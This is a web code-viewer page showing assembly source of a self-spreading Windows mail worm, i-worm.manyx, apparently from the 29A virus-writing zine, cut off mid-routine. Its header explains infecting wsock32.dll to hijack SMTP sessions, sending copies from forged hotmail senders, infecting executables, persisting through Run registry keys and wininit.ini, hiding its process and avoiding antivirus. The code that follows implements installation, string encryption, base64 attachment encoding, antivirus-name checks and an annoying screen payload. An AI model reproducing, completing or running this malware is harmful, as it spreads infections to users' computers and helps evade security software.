📄 29a-7.008
字号:
;
; i-worm.manyx
; Coded by Bumblebee
;
; DISCLAIMER -
;
; THIS IS THE SOURCE CODE OF A VIRUS/WORM.
;
; IN NO EVENT SHALL THE AUTHOR OF THIS PROGRAM BE LIABLE FOR ANY DIRECT,
; INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
; ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE.
;
; USE IT AT YOR OWN RISK, OR DON'T USE IT. BUT DON'T FUCK THE CODER!
;
; Some comments:
;
; Think about it as a main body able to install some of its parts (those
; parts are not a complete virus, only the needed stuff to let the main
; body keep on spreading). When one of those parts is installed, the
; rest can be removed from the system and the piece still work.
; The way each part work is very determined by the main body. That seems
; so logical for an infected file (the polymorphic code usually never
; changes once the file is infected), but is also applied to wsock
; infection. That is what i call 'slow behavior'.
; However there is a little random part, but is not very important after
; all.
;
; There follows a brief for each part:
;
; main body: infect wsock32.dll, install, payload and infect PE files
; wsock32.dll: hook smtp sessions to send a copy of the main body
; infected file: drop and exec main body
;
; Notice the infected files will exec main body EVER, no matter if it
; is installed yet. In that way the virus act as a direct action
; infector, even infected sample won't infect other files. That's due,
; once the main body is installed, it will infect all files in current
; directory (work directory). That means when an infected notepad is
; called by explorer for reading a txt file, it will try to drop the
; main body and exec it. At this point the work directory of the main
; body will be notepad's one, so it will infect files there as the
; classical direct action infector does.
;
; The only data fixed is the filename where the main body is saved in
; each drop. Some random data is based in the C HDD volume name and, in
; wsock case, in the stack of the app sending the mail. The infected
; samples will come from random hotmail address. I know that's not fair
; but most smtp and esmtp servers today check the sender domain exists.
; I'm sure ISPs won't block all hotmail mails (sexyfun.net is blocked
; in several ones huehuehue).
;
; Why ios.sys? Simple: it exists in DOS 6.22 (i'm not sure if older).
; Due to this is a name you're used to, and you won't delete it. Win9x
; have a io.sys file, but not ios (at least until you're not infected).
;
; Why the installation name is 8 random letter? Because Hybris and may
; be other viruses use the same way. A confused user is nice when he
; needs to find help.
;
; Why some strings are encrypted in main body and others not? mmm I've
; encrypted only some that may show as suspicious. Anyway it is only
; a protection before the file is installed, and no matter if that
; ABFDGABC.exe has suspicious strings or not. If you got it, IT'S VERY
; SUSPICIOUS. In the same way, if the user peeps into wsock32.dll...
; The fact is tested av were not able to detect it in 1st place.
;
; Sometimes filenames found into personal folder (usually my documents)
; will be used to generate the mail to send. Sometimes not. The wsock32
; hook is intended to be full compatible and stable (in fact it works
; fine with both blocking and non-blocking sockets, no matter how slow
; is the connection with the smtp server and what mta you use).
;
; I've coded it with win98 in mind, thus it is the most widespread
; win32 compliant system. Indeed most parts will work in most win32.
;
; It uses base64 and MIME 1.0, the payload is not destructive but clear
; enough (and annoying), and there are no comments in the source :)
;
; Have fun.
;
; - main.asm BOF -
%include "win32n.inc"
[extern ExitProcess]
[extern CreateFileMappingA]
[extern GetLastError]
[segment .text]
[global main]
main:
call stealthProc
call initAux
jc exitApp
call installMailHook
call install
jnc exitDeinitApp
xor eax,eax
push dword regName
push dword 1024
push eax
push dword 4
push eax
dec eax
push eax
call CreateFileMappingA
or eax,eax
jz exitDeinitApp
push eax
call GetLastError
pop ecx
cmp eax,0b7h
je exitDeinitApp
push ecx
not dword [fmask]
call scandirpe
call payload
call CloseHandle
exitDeinitApp:
call deInitAux
exitApp:
push dword 0
call ExitProcess
%include "auxf.inc"
%include "payload.inc"
%include "install.inc"
%include "infectpe.inc"
%include "poly.inc"
%include "findfiles.inc"
%include "process.inc"
%include "wsock.inc"
[segment .data]
seed dd 87654321h
iname db '\'
fname db 0,0,0,0,0,0,0,0
dd ~'.exe'
db 0
regKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0
regName db 0,0,0,0,0
hkey dd 0
drive db 'c:\',0
encTable db 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuv'
db 'wxyz0123456789+/'
fmask dd ~"*.ex"
db 'e',0
findHnd dd 0
perPath db "SOFTWARE\Microsoft\Windows\CurrentVersion"
db "\Explorer\Shell Folders",0
perValue db "Personal",0
PersonalPs dd 128
fmaskall dd ~"*.*"
kernel32dll db 'KERNEL32.DLL',0
registerSrvProc db 'RegisterServiceProcess',0
wsock32dllp db '\'
wsock32dll dd ~'wsoc',~'k32.'
db 'dll',0
wininitstr dd ~'[ren',~'ame]'
db 0dh,0ah
wininitstrLen equ $-wininitstr
wininit dd ~'\win'
db 'init.ini',0
dropCode:
%include "dropit.inc"
wsockCode:
%include "wsockhook.inc"
[segment .bss]
memory resd 1
attachment resd 1
vsize resd 1
swidth resd 1
sheight resd 1
localtime resd 4
fHnd resd 1
mapMem resd 1
fhmap resd 1
fileTime0 resd 2
fileTime1 resd 2
fileTime2 resd 2
fileAttrib resd 1
fileSize resd 1
padding resd 1
ccKey resd 1
poly resd 1
polySize resd 1
crptBegin resd 1
registers resd 8
freer resd 1
rIdx resd 1
rCnt resd 1
vKey resd 1
mKey resd 1
vIdx resd 1
vCnt resd 1
lCnt resd 1
kStack resd MAXLAYER
mStack resd MAXLAYER
finddata:
dwFileAttributes resd 1
dwLowDateTime0 resd 1
dwHigDateTime0 resd 1
dwLowDateTime1 resd 1
dwHigDateTime1 resd 1
dwLowDateTime2 resd 1
dwHigDateTime2 resd 1
nFileSizeHigh resd 1
nFileSizeLow resd 1
dwReserved resd 2
cFileName resb 260
cAlternateFilename resb 16
PersonalP resb 128
; - main.asm EOF -
; - payload.inc BOF -
[extern GetDesktopWindow]
[extern LoadIconA]
[extern GetWindowDC]
[extern DrawIcon]
[extern GetSystemMetrics]
[extern GetLocalTime]
payload:
push dword localtime
call GetLocalTime
lea esi,[localtime]
test word [esi+2],1
jnz doRet
cmp word [esi+6],5
jne doRet
test word [esi+8],8
jz doRet
mov al,0c3h
doRet equ $-1
push dword SM_CXFULLSCREEN
call GetSystemMetrics
mov [swidth],eax
push dword SM_CYFULLSCREEN
call GetSystemMetrics
mov [sheight],eax
push dword 32517 ; IDI_WINLOGO
push dword 0
call LoadIconA
push eax
call GetDesktopWindow
push eax
call GetWindowDC
pop esi
mov edi,eax
iconLoop:
push esi
push dword [sheight]
call rnd
push eax
push dword [swidth]
call rnd
push eax
push edi
call DrawIcon
jmp iconLoop
; - payload.inc EOF -
; - auxf.inc BOF -
[extern GetTickCount]
[extern GetModuleFileNameA]
[extern GlobalAlloc]
[extern GlobalFree]
[extern CreateFileA]
[extern GetFileSize]
[extern ReadFile]
[extern CloseHandle]
initAux:
push ebp
mov ebp,esp
sub esp,260
push ebp
sub ebp,260
push dword localtime
call GetLocalTime
call GetTickCount
add eax,dword [localtime+8]
add [seed],eax
push dword 260
push ebp
push dword 0
call GetModuleFileNameA
or eax,eax
jz near initAuxKO
push dword 0
push dword 80h
push dword 3
push dword 0
push dword 1
push dword 80000000h
push ebp
call CreateFileA
inc eax
jz near initAuxKO
dec eax
push eax
push dword 0
push eax
call GetFileSize
pop esi
mov edi,eax
mov dword [vsize],eax
mov dword [dropSize],eax
add eax,5
push eax
add eax,eax
add eax,eax
add eax,eax
add eax,eax
push eax
push dword GMEM_FIXED
call GlobalAlloc
or eax,eax
jz near initAuxKO
mov [memory],eax
pop ecx
add ecx,eax
mov [attachment],ecx
push dword 0h
push ebp
push edi
push eax
push esi
call ReadFile
push esi
call CloseHandle
mov eax,[vsize]
xor edx,edx
mov ecx,3
div ecx
or edx,edx
jz incredible
inc eax
incredible:
mul ecx
mov ecx,eax
mov eax,[memory]
mov edx,[attachment]
call encodeBase64
mov [attachmentSize],ecx
otherKeyPlz:
push dword 0ffh
call rnd
or al,al
jz otherKeyPlz
mov [ccKey],al
mov [cKey],al
mov esi,[memory]
xor eax,eax
mov al,[ccKey]
mov ecx,[dropSize]
encryptItLoop:
not byte [esi]
xor byte [esi],al
inc ax
inc esi
loop encryptItLoop
call genFileName
mov eax,(MAXPOLY*MAXLAYER)
add eax,dropperSize+5
add eax,[vsize]
push eax
push dword GMEM_FIXED
call GlobalAlloc
or eax,eax
jz initAuxKO
mov [poly],eax
call getPersonal
clc
mov al,0f9h
initAuxKO equ $-1
pop ebp
leave
ret
deInitAux:
push dword [poly]
call GlobalFree
push dword [memory]
call GlobalFree
ret
genFileName:
lea edi,[fname]
mov ecx,8
not dword [edi+ecx]
fileName:
push ecx
push dword 10
call rnd
pop ecx
add eax,'A'
stosb
loop fileName
ret
rnd:
mov eax,[seed]
imul eax,9E3779B9h
shr eax,16
add [seed],eax
xor edx,edx
mov ecx,[esp+4]
div ecx
mov eax,edx
retn 4
getPersonal:
push dword hkey
push dword 0
push dword 0
push dword perPath
push dword HKEY_CURRENT_USER
call RegOpenKeyExA
or eax,eax
jnz personalKO
push dword PersonalPs
push dword PersonalP
push eax
push eax
push dword perValue
push dword [hkey]
call RegQueryValueExA
or eax,eax
jnz personalKO
push dword [hkey]
call RegCloseKey
mov byte [pflag],1
outtaPersonal:
ret
personalKO:
mov byte [pflag],0
jmp outtaPersonal
isAV:
push edi
UCaseLoop:
cmp byte [edi],'a'
jb notUCase
cmp byte [edi],'z'
ja notUCase
sub byte [edi],'a'-'A'
notUCase:
inc edi
mov al,[edi]
or al,al
jnz UCaseLoop
pop edi
avStrLoop:
mov ax,word [edi]
not ax
cmp ax,~'AV'
je itIsAV
cmp ax,~'DR'
je itIsAV
cmp ax,~'SP'
je itIsAV
cmp ax,~'F-'
je itIsAV
cmp ax,~'AN'
je itIsAV
cmp ax,~'VE'
je itIsAV
cmp ax,~'CL'
je itIsAV
cmp ax,~'ON'
je itIsAV
not ax
inc edi
or ah,ah
jnz avStrLoop
clc
mov al,0f9h
itIsAV equ $-1
ret
encodeBase64:
xor esi,esi
lea edi,[encTable]
push ebp
xor ebp,ebp
baseLoop:
xor ebx,ebx
mov bl,byte [eax]
shr bl,2
and bl,00111111b
mov bh,byte [edi+ebx]
mov byte [edx+esi],bh
inc esi
mov bx,word [eax]
xchg bl,bh
shr bx,4
mov bh,0
and bl,00111111b
mov bh,byte [edi+ebx]
mov byte [edx+esi],bh
inc esi
inc eax
mov bx,word [eax]
xchg bl,bh
shr bx,6
mov bh,0
and bl,00111111b
mov bh,byte [edi+ebx]
mov byte [edx+esi],bh
inc esi
inc eax
xor ebx,ebx
mov bl,byte [eax]
and bl,00111111b
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -